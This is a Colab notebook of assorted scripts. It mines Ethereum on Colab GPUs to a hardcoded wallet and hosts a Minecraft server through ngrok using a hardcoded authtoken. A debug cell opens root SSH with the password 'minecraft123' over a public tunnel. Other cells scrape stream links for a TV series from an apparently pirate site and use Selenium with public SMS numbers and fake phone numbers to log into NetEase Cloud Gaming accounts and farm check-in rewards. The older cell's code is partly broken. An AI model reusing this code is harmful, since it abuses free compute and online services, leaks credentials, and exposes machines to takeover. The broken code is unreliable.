<a href="https://colab.research.google.com/github/LDwise/web/blob/main/all.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# ETH Miner

In [ ]:
#@title Ethermine { vertical-output: true, display-mode: "form" }
#@markdown https://ethermine.org/start
!wget https://github.com/ethereum-mining/ethminer/releases/download/v0.19.0-alpha.0/ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz
!tar -xzf ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz
!bin/ethminer -P stratum1+ssl://0xdd1c3bf842e7d03de67a2b7d9a51a4d1d6271c90@asia1.ethermine.org:5555

# MineColab

In [ ]:
#@title **Run a Minecraft Server on Google Colab!** { vertical-output: true, display-mode: "form" }
#@markdown ```
#@markdown ███╗   ███╗██╗███╗   ██╗███████╗ ██████╗ ██████╗ ██╗      █████╗ ██████╗ 
#@markdown ████╗ ████║██║████╗  ██║██╔════╝██╔════╝██╔═══██╗██║     ██╔══██╗██╔══██╗
#@markdown ██╔████╔██║██║██╔██╗ ██║█████╗  ██║     ██║   ██║██║     ███████║██████╔╝
#@markdown ██║╚██╔╝██║██║██║╚██╗██║██╔══╝  ██║     ██║   ██║██║     ██╔══██║██╔══██╗
#@markdown ██║ ╚═╝ ██║██║██║ ╚████║███████╗╚██████╗╚██████╔╝███████╗██║  ██║██████╔╝
#@markdown ╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ 
#@markdown ```
#@markdown **Run a Minecraft Server on Google Colab!**

#@markdown ---

#@markdown The script below will run your server. You'll have to create a server first to be able to use it - don't worry, the scripts below will do the majority of the work for you. You might also want to change the default region to your region, check below.
!pip -q install pyngrok
# Authenticate your ngrok agent
!ngrok authtoken 1wUFY16eVK1Al7BSicuT0VFZ7SC_5yYoYT5qLEpDTr4LtmUX1
import os
import re

# Update the package lists
!sudo apt update &>/dev/null && echo "apt cache successfully updated" || echo "apt cache update failed, you might receive stale packages"
# Install OpenJDK 16
# !wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | sudo apt-key add -
# !sudo add-apt-repository --yes https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ &>/dev/null || echo "Failed to add repo. Still can be ignored if openjdk16 gets installed."
# !sudo apt-get install adoptopenjdk-16-openj9 &>/dev/null && echo "Yay! Openjdk16 has been successfully installed." || echo "Failed to install OpenJdk16."
!apt-get install openjdk-8-jdk-headless -qq > /dev/null
os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-8-openjdk-amd64"
!update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java
!java -version
#Perform java version check
java_ver = !java -version 2>&1 | awk -F[\"\.] -v OFS=. 'NR==1{print $2}'
if java_ver[0] == "16" :
  print("Openjdk16 is working correctly, you are good to go.")
else:
  print("Openjdk16 doesn't seems to be installed or isn't working, falling back to java", java_ver[0], ". You might experience reduced performance.")

# Mount Google Drive
from google.colab import drive
drive.mount('/content/drive')
# Change directory to the Minecraft server folder on Google Drive
%cd "/content/drive/MyDrive/Colab Notebooks/Minecraft-server"
!ls #list the directory contents (to verify that working directory was changed)

In [ ]:
#@title Start Server { vertical-output: true, display-mode: "form" }

# Chose the tunnle service you want to use
# Available options: ngrok, argo
tunnel_service = "ngrok"

if tunnel_service == "ngrok":
  from pyngrok import conf, ngrok
  # Ask for the ngrok authtoken
  print("Get your authtoken from https://dashboard.ngrok.com/auth")
  import getpass
  # authtoken = getpass.getpass()  # input your Ngrok auth token everytime you run the cell or simply replace "getpass.getpass()" with your token in "double quotes"
  # ! ngrok authtoken $authtoken # login to ngrok
  !ngrok authtoken 1wUFY16eVK1Al7BSicuT0VFZ7SC_5yYoYT5qLEpDTr4LtmUX1

  # Sets default ngrok region
  conf.get_default().region = 'us'  # Change this to whichever region you want

  # Connect to ngrok
  url = ngrok.connect(25565, 'tcp')
  print('Your server address is ' + ((str(url).split('"')[1::2])[0]).replace('tcp://', ''))

  print('Starting server...')
  !java -Xmx6144M -Xms6144M -XX:+UseG1GC -XX:+ParallelRefProcEnabled -XX:MaxGCPauseMillis=200 -XX:+UnlockExperimentalVMOptions -XX:+DisableExplicitGC -XX:+AlwaysPreTouch -XX:G1NewSizePercent=30 -XX:G1MaxNewSizePercent=40 -XX:G1HeapRegionSize=8M -XX:G1ReservePercent=20 -XX:G1HeapWastePercent=5 -XX:G1MixedGCCountTarget=4 -XX:InitiatingHeapOccupancyPercent=15 -XX:G1MixedGCLiveThresholdPercent=90 -XX:G1RSetUpdatingPauseTimePercent=5 -XX:SurvivorRatio=32 -XX:+PerfDisableSharedMem -XX:MaxTenuringThreshold=1 -Dusing.aikars.flags=https://mcflags.emc.gs -Daikars.new.flags=true -jar server.jar nogui

else:
  # Download & make argo executable
  !wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
  !chmod +x cloudflared-linux-amd64
  print('Starting server...')
  !./cloudflared-linux-amd64 tunnel --url tcp://127.0.0.1:25565 | java -Xmx6144M -Xms6144M -XX:+UseG1GC -XX:+ParallelRefProcEnabled -XX:MaxGCPauseMillis=200 -XX:+UnlockExperimentalVMOptions -XX:+DisableExplicitGC -XX:+AlwaysPreTouch -XX:G1NewSizePercent=30 -XX:G1MaxNewSizePercent=40 -XX:G1HeapRegionSize=8M -XX:G1ReservePercent=20 -XX:G1HeapWastePercent=5 -XX:G1MixedGCCountTarget=4 -XX:InitiatingHeapOccupancyPercent=15 -XX:G1MixedGCLiveThresholdPercent=90 -XX:G1RSetUpdatingPauseTimePercent=5 -XX:SurvivorRatio=32 -XX:+PerfDisableSharedMem -XX:MaxTenuringThreshold=1 -Dusing.aikars.flags=https://mcflags.emc.gs -Daikars.new.flags=true -jar server.jar nogui


In [ ]:
#@title ## Make-a-Server { vertical-output: true, display-mode: "form" }
#@markdown The code below will download a server for you and accept the EULA. After running these scripts, your server will be ready to run.
#@markdown 
#@markdown **Download the Minecraft server**
#@markdown 
#@markdown The code below will download Paper, a high-performance fork of the Vanilla server.

# Replace "1.17" with your desired server version.
# If you use "1.17" you will use tests builds of PaperMC. Please do backups of your world. 
# Available versions:
# - 1.17.1
# - 1.17
# - 1.16.4
# - 1.16.3
# - 1.15.2
# - 1.14.4
# - 1.13.2
# - 1.12.2
# - 1.11.2
# - 1.10.2
# - 1.9.4
# - 1.8.8
# Newer versions might work too, however this isn't guaranteed.
# version = '1.17'

from google.colab import drive
# import requests

drive.mount('/content/drive')

# Create the directory which will be used for the server
! mkdir "/content/drive/MyDrive/Colab Notebooks/Minecraft-server"
%cd "/content/drive/MyDrive/Colab Notebooks/Minecraft-server"

print('Downloading to Google Drive...')

# Download Magma Server from https://magmafoundation.org/
!wget -O server.jar https://github.com/magmafoundation/Magma/releases/download/v761933c-CUSTOM/Magma-761933c-STABLE-server.jar
!ls

# url = 'https://papermc.io/api/v1/paper/' + version + '/latest/download'

# r = requests.get(url)

# if r.status_code is 200:
#   with open('/content/drive/MyDrive/Colab Notebooks/Minecraft-server/server.jar', 'wb') as f:
#     f.write(r.content)
#   print('Done!')
# else:
#   print('Error '+ str(r.status_code) + '! Most likely you entered a unsupported version. Try running the code again if you think that shouldn\'t have happened.')



#@markdown **Automatically accept the EULA**
!echo "eula=true" >> eula.txt

In [ ]:
#@title ## Debug { vertical-output: true, display-mode: "form" }
#@markdown SSH access to host OS
## For SSH access to host OS ##
#Download ngrok
! wget -q -c -nc https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
! unzip -qq -n ngrok-stable-linux-amd64.zip
#Setup sshd
! apt-get install -qq -o=Dpkg::Use-Pty=0 openssh-server pwgen > /dev/null
#Set root password
! echo root:minecraft123 | chpasswd #change the password (default is minecraft123)
! mkdir -p /var/run/sshd
! echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
! echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
! echo "LD_LIBRARY_PATH=/usr/lib64-nvidia" >> /root/.bashrc
! echo "export LD_LIBRARY_PATH" >> /root/.bashrc

#Run sshd
get_ipython().system_raw('/usr/sbin/sshd -D &')

#Ask token
print("Copy authtoken from https://dashboard.ngrok.com/auth")
import getpass
# authtoken = getpass.getpass() #input your Ngrok auth token everytime or simply replace "getpass.getpass()" with your token in "double quotes"

#Create tunnel
# get_ipython().system_raw('./ngrok authtoken $authtoken && ./ngrok tcp 22 &')
!ngrok authtoken 1wUFY16eVK1Al7BSicuT0VFZ7SC_5yYoYT5qLEpDTr4LtmUX1
!ngrok tcp 22 &

#Get the public address by running the cell below (for some reason, running both the commands in same cell results in an error. 
#Thus it has been kept in a separate cell)

In [ ]:
#@title ## Get public address { vertical-output: true, display-mode: "form" }
! curl -s http://localhost:4040/api/tunnels | python3 -c \
    "import sys, json; print(json.load(sys.stdin)['tunnels'][0]['public_url'])"

# Video Spider

In [ ]:
#@title Good Doctor S3 Spider { vertical-output: true, display-mode: "form" }
from re import search
from requests import get
from bs4 import BeautifulSoup

# GoodDoctor link from 91meiju
r = get('https://91mjw.com/vplay/MjIyNC0yLTA=.html')
# soup = BeautifulSoup(r.text, 'html.parser')
soup = BeautifulSoup(r.text, 'lxml')
# print(soup.prettify())
# soup.find('div',class_='class="vlink"').get('')
tabs = soup.find('section',class_='tab')
links=[]
for tab in tabs.find_all('a',attrs={'ref':'nofollow'}):
  link = 'https://91mjw.com%s'%str(tab.get('href'))
  links.append(link)
for link in links:
  r = get(link)
  soup = BeautifulSoup(r.text, 'lxml')
  episode = (soup.title.text).replace('在线观看 | 91美剧网','')#.replace('良医 第三季 第','')
  m3u8 = ((search(r'var vid="http.*m3u8";',soup.prettify())).group()).replace('var vid="','').replace('";','').replace('%3A',':').replace('%2F','/')
  print('<a href="%s">%s</a>'%(m3u8,episode))

<a href="https://vod2.buycar5.cn/20201001/EU9iGYBU/index.m3u8">良医 第三季 第01集</a>
<a href="https://vod2.buycar5.cn/20201001/wB6PPAIT/index.m3u8">良医 第三季 第02集</a>
<a href="https://vod2.buycar5.cn/20201001/GuElLwYe/index.m3u8">良医 第三季 第03集</a>
<a href="https://vod2.buycar5.cn/20201001/toZXYOR1/index.m3u8">良医 第三季 第04集</a>
<a href="https://vod2.buycar5.cn/20201001/sbYBOLgl/index.m3u8">良医 第三季 第05集</a>
<a href="https://vod2.buycar5.cn/20201001/TxsZNa2p/index.m3u8">良医 第三季 第06集</a>
<a href="https://vod2.buycar5.cn/20201001/PAZpTORp/index.m3u8">良医 第三季 第07集</a>
<a href="https://vod2.buycar5.cn/20201001/7Lqctagf/index.m3u8">良医 第三季 第08集</a>
<a href="https://vod2.buycar5.cn/20201001/IlYnvbpx/index.m3u8">良医 第三季 第09集</a>
<a href="https://vod2.buycar5.cn/20201001/Oe2g79ye/index.m3u8">良医 第三季 第10集</a>
<a href="https://vod2.buycar5.cn/20201001/De6iuNaP/index.m3u8">良医 第三季 第11集</a>
<a href="https://vod2.buycar5.cn/20201001/gYXSxyI3/index.m3u8">良医 第三季 第12集</a>
<a href="https://vod2.buycar5.cn/20201001/dS2qs4V7/i

# Netease Clound Gaming

In [ ]:
#@title checkin { vertical-output: true, display-mode: "form" }
try:
  from selenium import webdriver
except:
  print('Install package....')
  !apt -q -qq update
  !apt -q -qq install chromium-chromedriver
  !pip -q install selenium
  from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
try:
  from requests import get
except:
  !pip install requests2
  from requests import get
try:
  from bs4 import BeautifulSoup
except:
  !pip install beautifulsoup4
  from bs4 import BeautifulSoup
from re import sub
from google.colab.output import clear
from time import time,sleep
from IPython.display import HTML
clear()
# 对照库
trans = [
 {
  'ct':'Canada',
  'cct':'1 加拿大',
  'ctcode':'1',
 },
 {
  'ct':'France',
  'cct':'33 法国',
  'ctcode':'33',
 },
 {
  'ct':'United Kingdom',
  'cct':'44 英国',
  'ctcode':'44',
 },
 {
  'ct':'United States',
  'cct':'1 美国',
  'ctcode':'1',
 }
]
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
# 号码容器
phonelist = []
# 进入号码页面
for page in range(1,6):
  r = get('https://getfreesmsnumber.com/?page=%d'%page, headers=headers)
  soup = BeautifulSoup(r.text, 'lxml')
  # 寻找所有号码div
  for box in soup.find_all('div',class_='col-12 col-lg-3 col-md-4 col-sm-6 p-2'):
    # 获取当前div内city名字-城市名
    ct = box.find('h3',class_='p-0 m-0').string
    # 循环检测名字是否在已有对照库内
    for tran in trans:
      # 如果当前对照库名字与当前div城市名相符
      if ct == tran['ct']:
        link = 'https://getfreesmsnumber.com%s'%str(box.find('a',class_='btn btn-primary m-4')['href']).replace(' ','')
        fullphone = sub(r'\D*','',link)
        phone = sub('^%s'%tran['ctcode'],'',fullphone)
        # 成功获取到inde对照库号码
        info = {
            'ct':tran['ct'],
            'cct':tran['cct'],
            'ctcode':tran['ctcode'],
            'phone':phone,
            'link':link
        }
        phonelist.append(info)
        # print(str(info))
        # 停止寻找对照库
        break

# 設置Chrome啓動設置
options = webdriver.ChromeOptions()
# 無界面運行
options.add_argument('--headless')
# 以最高权限运行
options.add_argument('--no-sandbox')
# 忽略警告/錯誤/異常
options.add_argument('log-level=3')
# log-level: 
# Sets the minimum log level.
# Valid values are from 0 to 3: 
#     INFO = 0, 
#     WARNING = 1, 
#     LOG_ERROR = 2, 
#     LOG_FATAL = 3.
# default is 0.
# 避免崩潰
options.add_argument('--disable-dev-shm-usage')
#浏览器最大化
options.add_argument('--start-maximized')
# 隐身模式（无痕模式）
options.add_argument('--incognito')
# 不加载图片, 提升速度
options.add_argument('--blink-settings=imagesEnabled=false')
# 開啓Chrome並加入基礎設置
driver = webdriver.Chrome(options=options)
# 設定等待元素時間上限(單位秒)
wait = WebDriverWait(driver,15)

# 号码内循环
for info in phonelist:
  print(info['cct'],info['phone'])
  # 进入网易页面
  driver.get('https://cg.163.com/#/pc')
  # 删除广告
  try:
    wait.until(EC.presence_of_element_located((By.XPATH,'/html/body/div[3]/div/div/div[2]/a')))
    driver.execute_script('document.querySelector("body > div.confirm-shade.fadein").remove();document.querySelector("#app > div.slide.confirm-shade.popup.landscape").remove()')
  except:
    print('Del AD',end='\r')
  # 点击登录
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="nav-userinfo"]/div[@class="g-Btn g-Btn-green2"]')))
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div").click();')
  # 输入电话号码
  wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="14"]')))
  driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(info['phone'])
  # 显示ctcode框
  driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > div").click();')
  # 选择相对ctcode
  wait.until(EC.presence_of_element_located((By.XPATH,'//ul[@class="login-regions"]')))
  # 列表内循环寻找相符cct
  indx = 1
  for li in driver.find_elements_by_xpath('//ul[@class="login-regions"]/li[@class="f12"]'):
    code = str(li.get_attribute('textContent'))
    # 如果当前li框内容与cct相符
    if info['cct'] == code:
      # 点击该li框
      driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > ul > li:nth-child(%d)").click();'%(indx))
      # 退出循环
      break
    indx += 1
  # print('Fake:%s'%fake_phone)
  # 循环六次 验证码发送三次
  now = True
  for tim in range(11):
    # 点击下一步
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="login-box"]/div[@class="g-Btn g-Btn-green2"][contains(text(), "下一步")]')))
    driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
    sleep(1)
    # 点击返回
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="login-avatar"]/i[@class="icon icon-back"]')))
    driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.login-avatar > i").click();')
    # 更改电话号码
    wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="14"]')))
    # 轮流调换真假电话
    wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="14"][@placeholder="请输入手机号码"]')))
    if now == False:
      # 拟定假电话
      fake_phone = info['phone'].replace(info['phone'][-1],str(int(info['phone'][-1])+tim)[0])
      driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"][@placeholder="请输入手机号码"]').send_keys(fake_phone)
      print('  %s'%fake_phone)
      now = True
    else:
      driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"][@placeholder="请输入手机号码"]').send_keys(info['phone'])
      print('  %s'%info['phone'])
      now = False
  # 获取验证码
  start = time()
  # 限时60秒
  captcha = False
  text = ''
  while (time()-start)<=60:
    # 进入验证码网页
    r = get(info['link'], headers=headers)
    soup = BeautifulSoup(r.text, 'lxml')
    # display(HTML(soup.prettify()))
    # input('\n\n\n\nwait')
    # 获取首条信息
    try:
      text = soup.find('div',class_='card-body').text
    except:
      pass
    # 检测信息是否由Netease CloudGaming发出
    if 'Netease CloudGaming' in text:
      # 获取验证码
      captcha = sub(r'\D*','',text)
      print('  captcha:%s'%captcha)
      # 停止60秒循环
      break
  # 如果60秒后仍未获取到验证码
  if captcha == False:
    # 停止当前电话获取
    continue
  # 输入验证码
  wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="6"][@placeholder="请输入验证码"]')))
  sleep(2)
  # 不成功则继续
  redo = True
  while redo:
    try:
      driver.find_element_by_xpath('//input[@type="tel"][@maxlength="6"][@placeholder="请输入验证码"]').send_keys(captcha)
      redo = False
    except:
      display(HTML(driver.page_source))
  # print('检查是否同意协议',end='\r')
  try:
    cla = str(driver.find_element_by_xpath('//i[@class="icon icon-check"]/../..').get_attribute('class'))
    if cla != 'radio on':
      driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.radio > div > i").click();')
  except:
    pass
  # 点击登录
  driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.g-Btn.g-Btn-green2").click();')
  # 检查是否需要签到
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="nav-userinfo-item"]//i[@class="icon icon-checkin"]')))
  checkin = driver.find_element_by_xpath('//div[@class="nav-userinfo-item"]//i[@class="icon icon-checkin"]/..').get_attribute('class')
  # 如果需要签到
  if 'animation-swing-delay' in checkin:
    # 直接签到
    driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div:nth-child(2) > div.nav-dialog > div > div:nth-child(1) > div.checkin-main > div > div.award > div.g-Btn.g-Btn-green2").click();')
    # 刷新页面
    driver.refresh()
    print('Checkin Done')
  # 显示剩余时间
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > div.vipcard.pc > div.vipcard-top > div:nth-child(2) > span").click();document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog").style='';')
  # 获取剩余时间
  print('Time Left:%s'%driver.find_element_by_xpath('//div[@class="vipcard-bottom"]/div[@class="vipcard-bar f12"]/div[@class="bar-left"]').get_attribute('textContent'))
  # 退出登录
  wait.until(EC.presence_of_element_located((By.XPATH,"//div[@id='app']/header[@class='header']/div[@class='headerbox']/div[@class='nav']/div[@class='nav-con']/div[@class='nav-userinfo']/div[@class='nav-userinfo-item nav-user-center']//div[@class='user-avatar']")))
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > ul > li:nth-child(4)").click();')
  # 确认退出
  wait.until(EC.presence_of_element_located((By.XPATH,"//div[@class='confirm-shade fadein']/div[@class='cofirm']/div[@class='cofirm-cont']")))
  driver.execute_script('document.querySelector("body > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2").click();')
driver.quit()

In [ ]:
#@title old { vertical-output: true, display-mode: "form" }
try:
    from selenium import webdriver
except:
    print('Install package...\n下載所需插件以便執行...')
    !apt -q -qq update
    !apt -q -qq install chromium-chromedriver
    !pip -q install selenium
    from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.action_chains import ActionChains
from re import sub,compile
try:
    from requests import get,post
except:
    !pip install requests2
    from requests import get,post,
from requests.exceptions import ConnectionError
try:
    from bs4 import BeautifulSoup
except:
    !pip install beautifulsoup4
    from bs4 import BeautifulSoup
from time import time#,sleep
from google.colab.output import clear
from IPython.display import HTML

# 設置Chrome啓動設置
options = webdriver.ChromeOptions()
# 無界面運行
options.add_argument('--headless')
# 以最高权限运行
options.add_argument('--no-sandbox')
# 忽略警告/錯誤/異常
options.add_argument('log-level=3')
# log-level: 
# Sets the minimum log level.
# Valid values are from 0 to 3: 
#     INFO = 0, 
#     WARNING = 1, 
#     LOG_ERROR = 2, 
#     LOG_FATAL = 3.
# default is 0.
# 避免崩潰
options.add_argument('--disable-dev-shm-usage')
#浏览器最大化
options.add_argument('--start-maximized')
# 隐身模式（无痕模式）
options.add_argument('--incognito')
# 不加载图片, 提升速度
options.add_argument('--blink-settings=imagesEnabled=false')
# 開啓Chrome並加入基礎設置
driver = webdriver.Chrome(options=options)
# 設定等待元素時間上限(單位秒)
wait = WebDriverWait(driver,15)

headers = {
  'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
}

clear()

ls=[]
for page in range(1,5):
  r = get('https://getfreesmsnumber.com/?page=%d'%page,headers=headers)
  soup = BeautifulSoup(r.text, 'html.parser')
  boxs = soup.find_all('div',class_='card-body text-center')
  for box in boxs:
    detail={}
    detail['ct'] = box.find('div',class_='card-title').find('h3').get_text()
    detail['link'] = 'https://getfreesmsnumber.com%s'%box.find('a')['href']
    detail['fullphone'] = sub(r'\D*','',detail['link'])
    ls.append(detail)
# 进入网易云游戏网站
driver.get('https://cg.163.com/#/pc')
# 删除广告
try:
  wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
  driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape > div > button").click();document.querySelector("body > div.confirm-shade.fadein").style="display:none";')
except:
  print('删除广告',end='\r')
# 逐项号码迭代
for detail in ls:
  ct = detail['ct']
  link = detail['link']
  fullphone = detail['fullphone']
  # 登录界面
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="g-Btn g-Btn-green2"][contains(text(),"登录")]')))
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div").click();')
  # 号码列表
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="confirm-shade fadein"]/div[@class="cofirm login"]')))
  driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > div").click();')
  # 获取号码
  lis = driver.find_elements_by_xpath('//ul[@class="login-regions"]/li[@class="f12"]')
  lindex = 0
  for li in lis:
    lindex += 1
    ctcode = int(sub(r'\D*','',li.get_attribute('textContent')))
    if fullphone.startswith(str(ctcode))==False:
      phone = int(sub('^%d'%ctcode,'',fullphone))
      fakephone = int(phone + 1)
      break
  # click ctcode
  driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > ul > li:nth-child(%d)").click();'%lindex)
  # get more captcha
  pindex = 0
  for i in range(6):
    # input phone
    wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="14"]')))
    if pindex == 0:
      driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(str(phone))
      pindex += 1
    elif pindex == 1:
      driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(str(fakephone))
      pindex -= 1
    # next step
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="g-Btn g-Btn-green2"][contains(text(),"下一步")]')))
    driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
    # go back
    wait.until(EC.presence_of_element_located((By.XPATH,'//i[@class="icon icon-back"]')))
    driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.login-avatar > i").click();')
  # get captcha
  limits = 60
  start = float(time())
  text = ''
  # 1、增加重试连接次数
  requests.DEFAULT_RETRIES = 5
  s = requests.session()
  # 2、关闭多余的连接
  s.keep_alive = False
  while '--Netease CloudGaming' not in text:
    r = get(link, headers=headers)
    soup = BeautifulSoup(r.text, 'html.parser')
    text = str(soup.find('div',class_='card-body').get_text())
    end = float(time())
    if end-start >= limits:
      # skip this one
      break
  if end-start >= limits:
    print('timeout',end='\r')
    continue
  # input captcha
  captcha=sub(r'\D*','',text)
  wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="6"]')))
  driver.find_element_by_xpath('//input[@type="tel"][@maxlength="6"]').send_keys(captcha)
  # print('检查是否同意协议',end='\r')
  cla=str(driver.find_element_by_xpath('//i[@class="icon icon-check"]/../..').get_attribute('class'))
  if cla!='radio on':
    driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.radio > div > i").click();')
  # login
  driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.g-Btn.g-Btn-green2").click();')
  # del ad
  try:
    wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
    driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape").style="display:none";document.querySelector("body > div.confirm-shade.fadein").style="display:none";')
  except:
    pass
  try:
    # 签到界面
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="nav-userinfo-item"]//div[@class="nav-dialog"]/div[@class="checkin"]')))
    driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div:nth-child(2) > div.nav-dialog").setAttribute("style",'');')
    # 点击签到
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="checkin-main"]/div[@class="section checkin-item"]/div[@class="award"]')))
    driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div:nth-child(2) > div.nav-dialog > div > div:nth-child(1) > div.checkin-main > div > div.award > div.g-Btn.g-Btn-green2").click();')
    # 确认签到
    wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="confirm-shade fadein"]/div[@class="cofirm checkin-confirm"]/div[@class="cofirm-cont"]')))
    driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2.f14").click();')
  except:
    pass
  # click pc time
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="vipcard-tab"]/span[contains(text(),"端游充值")]')))
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > div.vipcard.pc > div.vipcard-top > div:nth-child(2) > span").click();')
  # get pc time
  pctime=str(('//div[@class="vipcard other pc"]/div[@class="vipcard-bottom"]/div[@class="vipcard-bar f12"]/div[@class="bar-left"]').get_attribute('textContent'))
  print(pctime,href)
  # logout
  driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > ul > li:nth-child(4)").click();')
  # confirm logout
  wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="cofirm"]/div[@class="cofirm-cont"]/div[@class="cofirm-btns double"]/a[@class="g-Btn g-Btn-green2"]')))
  driver.execute_script('document.querySelector("body > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2").click();')
driver.quit()
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
# from IPython.display import HTML

# # 2.0
# links = []
# # all number
# for page in range(1,5):
#   r = get('http://getfreesmsnumber.com/?page=%d'%page, headers=headers)
#   soup = BeautifulSoup(r.text, 'html.parser')
#   nums = soup.find_all('a',href=compile('/virtual-phone/p-\d*'))
#   for num in nums:
#     href = 'https://getfreesmsnumber.com%s'%(num.get('href').replace(' ',''))
#     print(href)
#     number = get(href, headers=headers)
#     soup1 = BeautifulSoup(number.text, 'html.parser')
#     display(HTML(str(soup1)))
#     data = str(soup1.find('footer',class_=compile('.*blockquote-footer.*')).get_text())
#     if (('seconds' in data) or ('minutes' in data) or ('hours' in data)) and (href not in links):
#       links.append(href)
#       print(href)
# print(links)
# # netease login
# driver.get('https://cg.163.com/#/pc')
# # del ad
# try:
#   wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
